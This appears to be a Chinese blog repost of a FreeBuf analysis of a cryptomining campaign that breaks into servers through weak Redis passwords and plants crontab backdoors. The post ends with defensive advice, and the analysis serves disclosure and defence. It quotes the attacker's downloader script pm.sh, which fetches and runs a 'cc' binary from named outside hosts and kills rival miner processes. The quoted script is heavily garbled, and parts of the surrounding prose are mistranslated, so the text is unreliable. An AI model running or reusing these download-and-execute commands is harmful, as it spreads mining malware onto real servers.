全文见《近期基于Redis蜜罐捕获的恶意挖矿活动》
链接至: https://www.freebuf.com/articles/system/256715.html
在此构建了等待攻击者进入瓮中的蜜罐,但实际上在生产环境中,由于存在Redis的弱密码,自己的服务器成为了攻击者。
攻击者通过redis的默认端口、弱密码密码注入redis服务器内部,约有4个Back1-4的crontab进程。
下图,图来自FreeBUF,是借用图。
相应的下载文件链接到: http://d.powreofwish.com/pm.sh
pm.sh脚本文件的内容:
path=$ path :/usr/xq DDP :/xq DDP 3360/usr/sxqddp 3360/usr/local/xq DDP 3360/usr/local thethere grep b5 a9 c 7b D8 FD b2b6 e 5c 4431 a 90 b 83010 f|grep-v grep|WC-l ` if [ $ sum-eq1 ] thenchmodx/usr/xq DDP/PAM dicks/usr/thenexportdebian _ frontend=noninteractiveapt-get install-yunhidefisleep1if [-x ' $ ]; thenyuminstall-ye pel-releaseyuminstall-yunhidefisleep1unhide quick ' grep PID : ' { print $4} ' ' xargs-I % kill-9 % psaux|grep-v grep|grep ' cc ' { PS } xargs-I % kill-9 % psaux|grep-v grep ' grep-vgreeep xargs-I % kill-9 % psaux|grep-v grep ' png '|awk ' {打印$2} '|xargs-I % kill-9 % psauu grep ' ups '|awk ' {打印$2}|xargs-I % kill-9 % pkillupspkillccpkillpcpkillxrpkillpngpkillkdevtmpfsisleep1/usr/xq DDP/t-I/usr/xq DDP/PAM dicks/usr/xq DDP/t-I/var/lib/cc/xq DDP/RM-RF/usr/chattr-I/tmp/kdedp usr/xq DDP/t-I/tmp/tmp ti/tmp/kdevtmpfsiif [-x '/usr/xq DDP/wget '-o-x '/xq DDP/wget ' ]; then wget-c http://a.powreofwish.com/cc-o/var/lib/ccch modx/var/lib/cc/cc/cc elif [-x ' ] ccch modx/var/lib/cc/var/lib/cc/cc/lib/cc elif [-x '/usr/usr ] thenwge-c http://a.powreofwish.cord usr/xq ] thenget-c http://a.powreofwish.com/cc-o/var/lib/ccch modx/var/lib/cc/var/lib/cc/cc elif [ ccch modx/var/lib/cc/var/lib/cc/cc elif [-x '/usr/xcel if ] then URL-fs http://a.powreofwish.com/cc celserpm-e-- nodepswgetyum-yinstallwgetwget-c http://a.powreofwish.com/cc-o/var/lib/ccch modx/var/lib/CCH
unhide是一个紧凑的web取证工具,用于发现rootkit、LKM和其他技术隐藏的流程和TCP/UDP端口。 的程序可以在xydsg中打开。 上述文件中有说明,所以省略说明。
请避开较弱的密码,更改常用端口,防止root用户直接启动redis服务,并始终观察您自己的服务,查看是否有爆炸性的高进程在运行。
安全不是小事,一不小心,你的裤子就会被别人脱下来。